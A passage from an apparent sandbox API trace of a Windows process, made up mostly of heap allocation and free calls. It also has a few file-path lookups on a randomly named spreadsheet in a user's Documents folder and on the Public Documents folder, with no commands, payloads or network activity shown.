dwFlags=0x0, lpMem=0x2aaafa8 | out: hHeap=0x2af0000) returned 1 [0223.157] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae88 | out: hHeap=0x2af0000) returned 1 [0223.158] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0f8 | out: hHeap=0x2af0000) returned 1 [0223.158] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72358 [0223.158] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f70a0 [0223.158] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab008 [0223.158] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x3854e48 [0223.158] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77bc0 | out: hHeap=0x2af0000) returned 1 [0223.158] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab008 | out: hHeap=0x2af0000) returned 1 [0223.158] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab008 [0223.158] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab008 | out: hHeap=0x2af0000) returned 1 [0223.158] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721a8 [0223.158] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0223.158] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae70 [0223.158] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae70 | out: hHeap=0x2af0000) returned 1 [0223.158] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f70a0 | out: hHeap=0x2af0000) returned 1 [0223.158] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72358 | out: hHeap=0x2af0000) returned 1 [0223.158] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722f8 | out: hHeap=0x2af0000) returned 1 [0223.158] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab080 [0223.158] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72288 [0223.158] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf90 [0223.158] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab020 [0223.158] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72298 [0223.158] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae58 [0223.158] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0223.158] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae58 | out: hHeap=0x2af0000) returned 1 [0223.158] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab020 | out: hHeap=0x2af0000) returned 1 [0223.158] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf90 | out: hHeap=0x2af0000) returned 1 [0223.159] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72288 | out: hHeap=0x2af0000) returned 1 [0223.159] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x60) returned 0x2a75068 [0223.159] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents/_wc0ld1_h 9LSGLE.xlsx", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\_wc0ld1_h 9LSGLE.xlsx", lpFilePart=0x8cf650*="_wc0ld1_h 9LSGLE.xlsx") returned 0x2f [0223.159] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a75068 | out: hHeap=0x2af0000) returned 1 [0223.159] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\_wc0ld1_h 9LSGLE.xlsx" (normalized: "c:\\users\\fd1hvy\\documents\\_wc0ld1_h 9lsgle.xlsx")) returned 0xffffffff [0223.159] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x3854e48 | out: hHeap=0x2af0000) returned 1 [0223.159] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0223.159] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafc0 | out: hHeap=0x2af0000) returned 1 [0223.159] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaff0 | out: hHeap=0x2af0000) returned 1 [0223.159] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab080 | out: hHeap=0x2af0000) returned 1 [0223.159] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0c8 | out: hHeap=0x2af0000) returned 1 [0223.159] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0223.159] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e6c0 | out: hHeap=0x2af0000) returned 1 [0223.159] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0223.159] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb80 | out: hHeap=0x2af0000) returned 1 [0223.159] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0223.159] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e640 | out: hHeap=0x2af0000) returned 1 [0223.159] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0223.159] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72328 [0223.159] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e18 [0223.160] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72318 [0223.160] CharUpperBuffW (in: lpsz="A5700E02918", cchLength=0xb | out: lpsz="A5700E02918") returned 0xb [0223.160] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e18 | out: hHeap=0x2af0000) returned 1 [0223.160] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72318 | out: hHeap=0x2af0000) returned 1 [0223.160] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab098 [0223.160] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a722c8 [0223.160] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab128 [0223.160] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0b0 [0223.160] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72208 [0223.160] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaff0 [0223.160] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72208 | out: hHeap=0x2af0000) returned 1 [0223.160] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72398 [0223.160] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab050 [0223.160] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722d8 [0223.160] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf30 [0223.160] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722d8 | out: hHeap=0x2af0000) returned 1 [0223.160] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a722d8 [0223.160] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab110 [0223.160] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722f8 [0223.160] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722f8 | out: hHeap=0x2af0000) returned 1 [0223.160] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaae40 [0223.160] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d50 [0223.160] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaeb8 [0223.160] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722f8 [0223.160] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaeb8 | out: hHeap=0x2af0000) returned 1 [0223.160] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77aa8 [0223.161] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae70 [0223.161] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae88 [0223.161] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cb0 [0223.161] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0c8 [0223.161] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72338 [0223.161] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0c8 | out: hHeap=0x2af0000) returned 1 [0223.161] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b20 [0223.161] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf60 [0223.161] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaeb8 [0223.161] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cd8 [0223.161] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf78 [0223.161] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721f8 [0223.161] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf78 | out: hHeap=0x2af0000) returned 1 [0223.161] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b48 [0223.161] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0e0 [0223.161] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de40 [0223.161] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0223.161] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72288 [0223.161] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72298 [0223.161] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae58 [0223.161] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab068 [0223.161] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72348 [0223.161] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf78 [0223.161] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0223.161] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721b8 [0223.161] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77bc0 [0223.161] CharUpperBuffW (in: lpsz="SSA5700E02918", cchLength=0xd | out: lpsz="SSA5700E02918") returned 0xd [0223.162] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77bc0 | out: hHeap=0x2af0000) returned 1 [0223.162] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0223.162] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf78 | out: hHeap=0x2af0000) returned 1 [0223.162] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab068 | out: hHeap=0x2af0000) returned 1 [0223.162] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae58 | out: hHeap=0x2af0000) returned 1 [0223.162] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0223.162] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72288 | out: hHeap=0x2af0000) returned 1 [0223.162] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ea40 [0223.162] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0223.162] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ea40 | out: hHeap=0x2af0000) returned 1 [0223.162] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0223.162] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafc0 [0223.162] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72388 [0223.162] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafc0 | out: hHeap=0x2af0000) returned 1 [0223.162] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f58 [0223.162] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae58 [0223.162] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaea0 [0223.162] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72218 [0223.162] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c10 [0223.162] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf78 [0223.162] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72318 [0223.162] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf78 | out: hHeap=0x2af0000) returned 1 [0223.162] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77df0 [0223.162] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab008 [0223.162] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf78 [0223.162] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae58 | out: hHeap=0x2af0000) returned 1 [0223.162] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab020 [0223.163] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab068 [0223.163] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721e8 [0223.163] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ad0 [0223.163] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf90 [0223.163] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72348 [0223.163] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf90 | out: hHeap=0x2af0000) returned 1 [0223.163] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c88 [0223.163] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab038 [0223.163] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf48 [0223.163] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab020 | out: hHeap=0x2af0000) returned 1 [0223.163] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0c8 [0223.163] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab080 [0223.163] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72358 [0223.163] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d00 [0223.163] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaed0 [0223.163] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72208 [0223.163] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaed0 | out: hHeap=0x2af0000) returned 1 [0223.163] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b70 [0223.163] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaed0 [0223.163] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0f8 [0223.163] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0c8 | out: hHeap=0x2af0000) returned 1 [0223.163] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0c8 [0223.163] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae58 [0223.163] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721b8 [0223.163] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d28 [0223.163] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaee8 [0223.163] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721a8 [0223.164] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaee8 | out: hHeap=0x2af0000) returned 1 [0223.164] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77a80 [0223.164] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaee8 [0223.164] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf00 [0223.164] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721d8 [0223.164] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0c8 | out: hHeap=0x2af0000) returned 1 [0223.164] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf90 [0223.164] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0223.164] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae58 | out: hHeap=0x2af0000) returned 1 [0223.164] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0223.164] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf00 | out: hHeap=0x2af0000) returned 1 [0223.164] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0c8 [0223.164] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f58 | out: hHeap=0x2af0000) returned 1 [0223.164] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0223.164] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf90 | out: hHeap=0x2af0000) returned 1 [0223.164] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0223.164] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72238 [0223.164] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae58 [0223.164] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf00 [0223.164] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72298 [0223.164] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf90 [0223.164] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0223.164] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf18 [0223.164] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721d8 [0223.164] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafa8 [0223.164] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0223.164] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafc0 [0223.165] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721d8 [0223.165] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab020 [0223.165] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0223.165] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab338 [0223.165] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72228 [0223.165] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab218 [0223.165] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72368 [0223.165] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="[\\\\/]+\\z", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0223.165] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x9) returned 0x2aab350 [0223.165] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="[\\\\/]+\\z", cchWideChar=9, lpMultiByteStr=0x2aab350, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="[\\\\/]+\\z", lpUsedDefaultChar=0x0) returned 9 [0223.165] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab350 | out: hHeap=0x2af0000) returned 1 [0223.165] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x52) returned 0x2a5fa20 [0223.165] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab350 [0223.165] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\Public\\Documents", cchWideChar=26, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0223.165] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1a) returned 0x2a77c60 [0223.165] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\Public\\Documents", cchWideChar=26, lpMultiByteStr=0x2a77c60, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\Public\\Documents", lpUsedDefaultChar=0x0) returned 26 [0223.165] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab338 | out: hHeap=0x2af0000) returned 1 [0223.165] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77af8 [0223.165] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c60 | out: hHeap=0x2af0000) returned 1 [0223.165] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x34) returned 0x2a5eb80 [0223.165] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72378 [0223.165] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab338 [0223.165] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72388 [0223.165] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab710 [0223.165] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721b8 [0223.165] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6f8 [0223.165] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721d8 [0223.166] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6f8 | out: hHeap=0x2af0000) returned 1 [0223.166] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77be8 [0223.166] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x2a77be8, cbMultiByte=26, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 26 [0223.166] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x34) returned 0x2a5e800 [0223.166] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x2a77be8, cbMultiByte=26, lpWideCharStr=0x2a5e800, cchWideChar=26 | out: lpWideCharStr="C:\\Users\\Public\\Documents") returned 26 [0223.166] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0223.166] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0223.166] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e800 | out: hHeap=0x2af0000) returned 1 [0223.166] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77be8 | out: hHeap=0x2af0000) returned 1 [0223.166] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0223.166] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0223.166] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0223.166] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab338 | out: hHeap=0x2af0000) returned 1 [0223.166] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0223.166] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab338 [0223.166] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5fa20 | out: hHeap=0x2af0000) returned 1 [0223.166] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab350 | out: hHeap=0x2af0000) returned 1 [0223.166] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab218 | out: hHeap=0x2af0000) returned 1 [0223.166] HeapFree (in: hHeap=0x2af0000, 